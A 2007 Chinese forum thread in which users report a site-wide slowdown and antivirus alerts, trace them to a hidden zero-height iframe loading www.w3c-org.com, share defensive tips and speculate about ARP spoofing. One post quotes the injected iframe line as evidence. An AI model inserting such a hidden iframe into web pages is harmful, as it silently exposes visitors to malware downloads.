论坛异常(顶楼增加报告,欢迎添砖加瓦)
yamibohk11 今天早上开始我开300就慢过我家小龟散步的速度了,我还觉得是我自己出了问题,于是去把电脑里面有的装备都带上了,什么瑞星金山江民诺顿卡巴QQKAV,因为平时就习惯了裸奔,于是看看今天是中了什么毒.总有一个帮我杀死它.不过问题是...我把浏览器都关了以后,什么毒什么木马都杀不出来...
yamibohk10 我再走其他论坛其他网站都没有发生类似事件,于是我再上300看看,总算给我看到了敌人的影子了(见下图)
就是这个一看就知道是有东西的网址....只在登陆300行走的时候才见到的,一开始只在水区见到,但是半个小时以后就大范围扩散到管理区都异常yamibohk07 那现在究竟是我有问题还是300有问题......
yamibohk11
发生异常时情况报告
(裸奔状态)
CPU马上开到最大.
状态报告栏出现图中的网址(最早是出现在图中出现那一贴里面,最后连进入管理板都很难)
原本还有200M可用的内存马上剩下5M.
IE出现假死状态.
电脑10秒后无法支持,需要心肺复苏.
(瑞星状态)
状态报告栏出现图中的网址
弹出警告,关闭IE
(卡巴IE内嵌版)
警告 关闭IE
(QQKAV)
屏蔽
[ 本帖最后由 丫鬟 于 2007-11-14 12:51 编辑 ] <iframe src=http://www.w3c-org.com width=100 height=0></iframe>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
把http://www.w3c-org.com放进IE受限制列表里吧
[ 本帖最后由 黑崎さむらい 于 2007-11-13 10:45 编辑 ] yamiboqe005 谢谢女王指点,现在游走一下测试
yamiboqe005 一下子解救了几位网友的苦难,女王你真是再世菩萨,yamiboqe005 yamibon014
[ 本帖最后由 丫鬟 于 2007-11-13 11:07 编辑 ] 丫环,还好不是偶一人遇到这问题啊
一同RP吧yamiboshiho
感谢女王
也感谢望月yamiboshiho 是不是和这个帖子一个问题?
https://bbs.yamibo.com/thread-65119-1-1.html 就是从W3C开始下载那些木马,截取流量等等…… 是在哪个帖子或者哪个页面出现这种状况?
这种状况还一直存在吗?
我把论坛模板和脚本文件找了一遍,没找到内容含有w3c-org的文件,看了看最近两天有修改痕迹的文件,也没有可疑的。 原帖由 siyeclover 于 2007-11-13 14:18 发表 https://bbs.yamibo.com/images/common/back.gif
是在哪个帖子或者哪个页面出现这种状况?
这种状况还一直存在吗?
我把论坛模板和脚本文件找了一遍,没找到内容含有w3c-org的文件,看了看最近两天有修改痕迹的文件,也没有可疑的。
看这个帖子的source就有w3c-org的身影……
http://i2.tinypic.com/82dd669.jpg 原帖由 漫步而行 于 2007-11-13 15:28 发表 https://bbs.yamibo.com/images/common/back.gif
看这个帖子的source就有w3c-org的身影……
http://i2.tinypic.com/82dd669.jpg
这是 黑崎さむらい在2楼的帖子的内容。 原帖由 siyeclover 于 2007-11-13 15:41 发表 https://bbs.yamibo.com/images/common/back.gif
这是 黑崎さむらい在2楼的帖子的内容。
你要的不是这个吗?yamibon012
那我就不知道了,飘走飘走yamiboqe005 跟300同一机房的机器, 或者是浏览者局域网中的机器中招, 是ARP攻击吧, 自己伪装为网关, 过路数据一律挂马, 但是查自己的文件死都查不出问题.
[ 本帖最后由 Rosetta 于 2007-11-13 16:26 编辑 ] 我也遇到這個問題 整個電腦都當了。。。yamiboqe029 原帖由 Rosetta 于 2007-11-13 15:52 发表 https://bbs.yamibo.com/images/common/back.gif
跟300同一机房的机器中招, 是ARP攻击吧, 自己伪装为网关, 过路数据一律挂马, 但是查自己的文件死都查不出问题.
又是ARP啊,我在学校已经被它折磨得没脾气了。。。。 我只覺得這兩天300變慢了。
我是裸奔,啥都沒裝XD 原帖由 TOKAGE 于 2007-11-13 18:10 发表 https://bbs.yamibo.com/images/common/back.gif
我只覺得這兩天300變慢了。
我是裸奔,啥都沒裝XD
很同意,我用的APPLE倒是不怎么中毒或当机,可是300的页面这两天启动很慢还经常呈现空白页面状态yamibohk02 不过过一会儿就又好了。。很奇怪 《山海经》海外东经卷九有云,东海之滨有国名天幻,其主讳chocobo,宅心仁厚,其国民风淳朴,百姓皆古道热肠,且多能人异士,他国若能得一助力,无不国力大增,遂奉为至宝。
哦哦哦哦哦,原来《山海经》里写的不全是骗人的。
我刚才看了一下arp表,然后telnet了一下网关,是台死磕3600,至少刚才,局域网里没有冒充网关的机器。
把arp表改成静态的了。
[ 本帖最后由 siyeclover 于 2007-11-13 19:51 编辑 ] 名稱:HTML/Silly.Gen
感染檔案:w3c-org.htm
我被嚇到了呢
11/13日凌晨就有了>"<"
冒死點進論壇
每次都被這個彈出來yamibohk02 ||| BT發佈系統....我只看得見英文和數字和[討論](簡體)其他全是問號
是日文不能顯示嗎?
不會是我電腦的問題吧= ="
另外WIKI是擺假的吧Orz 蒼瑀,是在看了哪个帖子后这样?
asouro,bt是另外一位大侠在调整,早上大概会正常吧。
wiki其实好像存在快一年了,但这个东西需要有人去编写,至少得有人去教大家怎么弄。我觉得应该是筱林透这样百合达人去填充内容,因为我对百合一窍不通弄不了这个,但她死活不肯学怎么玩wiki,所以一直闲置了。 說到wiki。。。呃。。。我想知道diz默認面板中哪是指向wiki的。。。我貌似一直沒看到。。。= =b
页:
[1]
2